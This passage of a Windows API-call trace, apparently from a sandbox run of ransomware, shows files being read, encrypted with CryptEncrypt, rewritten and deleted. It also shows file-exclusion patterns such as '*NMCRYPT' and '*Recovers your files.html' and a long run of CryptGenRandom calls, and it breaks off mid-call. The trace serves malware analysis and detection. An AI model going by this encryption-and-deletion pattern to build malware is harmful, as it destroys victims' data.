lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.783] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.783] GetLastError () returned 0x0 [0147.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.783] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.783] GetLastError () returned 0x0 [0147.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.783] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.783] GetLastError () returned 0x0 [0147.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xc0, lpOverlapped=0x0) returned 1 [0147.783] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xc0, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xd0) returned 1 [0147.783] GetLastError () returned 0x0 [0147.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xd0, lpOverlapped=0x0) returned 1 [0147.783] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.783] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0x20 [0147.784] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml", dwFileAttributes=0x20) returned 0 [0147.784] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 1 [0147.784] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml")) returned 0 [0147.784] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" [0147.784] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.784] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB432.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb432.tmp")) returned 0xb432 [0147.785] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB432.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb432.tmp"), dwFlags=0x1) returned 0 [0147.785] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB432.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb432.tmp")) returned 1 [0147.785] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0147.785] wcslen (_String="OK") returned 0x2 [0147.785] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.785] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.785] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0147.785] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0147.785] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0147.785] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*NMCRYPT") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*Recovers your files.html") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*.exe") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*.dll") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*.lnk") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*.bat") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*.ini") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*.msi") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*.scf") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*pagefile.sys*") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*AppData*") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\winrar\\*") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.785] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\java\\*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\windows\\*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\ESET\\*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\AVG\\*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*Atheros*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*Realtek*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*bootmgr*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*boot*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*boot*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*IO.SYS*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*ntldr*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*chrome*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*opera*") returned 0 [0147.786] PathMatchSpecW (pszFile="ipsrom.xml", pszSpec="*firefox*") returned 0 [0147.786] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml", pszSpec="*") returned 1 [0147.786] strlen (_Str="NMoreira") returned 0x8 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.786] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.787] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.788] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.789] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 